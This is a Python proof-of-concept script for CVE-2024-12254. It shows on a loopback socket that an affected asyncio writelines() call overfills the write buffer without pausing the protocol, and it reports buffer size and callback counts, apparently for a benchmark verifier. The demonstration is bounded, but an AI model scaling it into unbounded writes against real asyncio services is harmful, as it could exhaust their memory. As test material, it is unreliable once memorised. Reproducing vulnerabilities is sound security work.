#!/usr/bin/env python3
"""CVE-2024-12254 PoC driver.

Drives a real asyncio _SelectorSocketTransport (the affected SelectorEventLoop
path) over a loopback socket whose peer NEVER reads. With a low high-water mark
set, a single bounded transport.writelines() call queues data past the
high-water mark and leaves self._buffer non-empty, which makes writelines() take
the vulnerable branch:

    if self._buffer:
        self._loop._add_writer(self._sock_fd, self._write_ready)
        # <-- patched 3.12.9 adds self._maybe_pause_protocol() HERE; 3.12.8 omits it

On the vulnerable interpreter pause_writing() is therefore never called, even
though get_write_buffer_size() > high_water (asyncio pauses the protocol once
the buffer size exceeds the high-water mark). On a fixed interpreter the same
workload fires pause_writing() exactly once.

This script only DRIVES the transport and reports the two flow-control signals
that the verifier's harness inspects:
  - the transport write-buffer size (transport.get_write_buffer_size())
  - whether the verifier-owned Protocol.pause_writing hook fired

It does not assert success; the verifier decides by reading the resulting state.
"""
import asyncio
import socket
import sys


class FlowControlProtocol(asyncio.Protocol):
    """asyncio Protocol that records its transport and counts flow-control callbacks.

    The two counters are the signals this PoC reports: how many times the
    transport asked the protocol to pause writing, and how many times it asked
    it to resume.
    """

    def __init__(self):
        # No transport until connection_made() runs.
        self.transport = None
        # Both counters start at zero and only ever increase.
        self.pause_writing_calls = self.resume_writing_calls = 0

    def connection_made(self, transport):
        """Keep a reference to *transport* for later inspection."""
        self.transport = transport

    def pause_writing(self):
        """Count one pause_writing() notification from the transport."""
        self.pause_writing_calls = self.pause_writing_calls + 1

    def resume_writing(self):
        """Count one resume_writing() notification from the transport."""
        self.resume_writing_calls = self.resume_writing_calls + 1


async def drive(high_water, low_water, chunk_size, num_chunks):
    """Push one writelines() call past the high-water mark and report signals.

    Creates a loopback socket pair and wraps one end in a transport via
    loop.connect_accepted_socket(). It then lowers the transport's
    write-buffer limits and queues ``num_chunks`` chunks of ``chunk_size``
    bytes with a single transport.writelines() call. The peer socket is
    never read.

    Prints space-separated ``key value`` lines to stdout:
    - the interpreter version;
    - the loop and transport type names;
    - the effective high-water mark;
    - the write-buffer size after the call;
    - the pause/resume callback counts;
    - whether that size exceeds the high-water mark.

    Both sockets (or the transport that owns one of them) are released even
    if a step fails.

    Args:
        high_water: High-water mark passed to set_write_buffer_limits().
        low_water: Low-water mark passed to set_write_buffer_limits().
        chunk_size: Size in bytes of each chunk.
        num_chunks: Number of chunks handed to writelines().

    Raises:
        ValueError: Propagated from set_write_buffer_limits() when the limits
            are invalid (asyncio requires high >= low >= 0).
    """
    loop = asyncio.get_running_loop()

    # Build a connected loopback socket pair. rsock is the peer; we NEVER read
    # from it, so the kernel send buffer on wsock fills and the transport's
    # internal Python buffer accumulates -> writelines() leaves _buffer non-empty.
    rsock, wsock = socket.socketpair()
    transport = None
    try:
        rsock.setblocking(False)
        wsock.setblocking(False)

        # Shrink the kernel buffers so OS backpressure kicks in quickly with a
        # small, bounded workload (no real-RAM exhaustion needed). Best effort:
        # if the platform rejects the options, its default sizes are kept.
        try:
            wsock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 4096)
            rsock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 4096)
        except OSError:
            pass

        protocol = FlowControlProtocol()
        transport, _ = await loop.connect_accepted_socket(
            lambda: protocol, wsock
        )

        # Force a low high-water mark, matching the upstream regression test,
        # so the crossing is deterministic and bounded.
        transport.set_write_buffer_limits(high=high_water, low=low_water)
        # get_write_buffer_limits() returns (low, high); read it once.
        effective_high = transport.get_write_buffer_limits()[1]

        # Confirm we are exercising the affected transport/loop.
        print("python_version", ".".join(map(str, sys.version_info[:3])))
        print("loop_type", type(loop).__name__)
        print("transport_type", type(transport).__name__)
        print("high_water", effective_high)

        payload = [b"X" * chunk_size] * num_chunks

        # The vulnerable call. After this, on 3.12.8 the buffer is non-empty
        # and the write handler is registered, but pause_writing() was never
        # invoked.
        transport.writelines(payload)

        buf_size = transport.get_write_buffer_size()
        print("write_buffer_size", buf_size)
        print("pause_writing_calls", protocol.pause_writing_calls)
        print("resume_writing_calls", protocol.resume_writing_calls)
        # asyncio pauses the protocol only when the buffer size is strictly
        # greater than the high-water mark; use the same comparison here.
        print("buffer_exceeds_high_water", buf_size > effective_high)
    finally:
        # Once the transport exists it owns wsock and abort() tears it down;
        # if transport creation never succeeded, wsock must be closed here.
        if transport is None:
            wsock.close()
        else:
            transport.abort()
        rsock.close()


def main():
    """Run the PoC driver, taking optional overrides from the command line.

    Optional positional arguments, each parsed with int(), in order:
    high_water (default 1024), low_water (default 256),
    chunk_size (default 65536), num_chunks (default 64).
    Any arguments beyond the fourth are ignored.
    """
    # Defaults are meant to give a bounded, deterministic crossing.
    defaults = (1024, 256, 65536, 64)
    overrides = sys.argv[1:]
    settings = [
        int(overrides[idx]) if idx < len(overrides) else fallback
        for idx, fallback in enumerate(defaults)
    ]
    asyncio.run(drive(*settings))


if __name__ == "__main__":
    main()
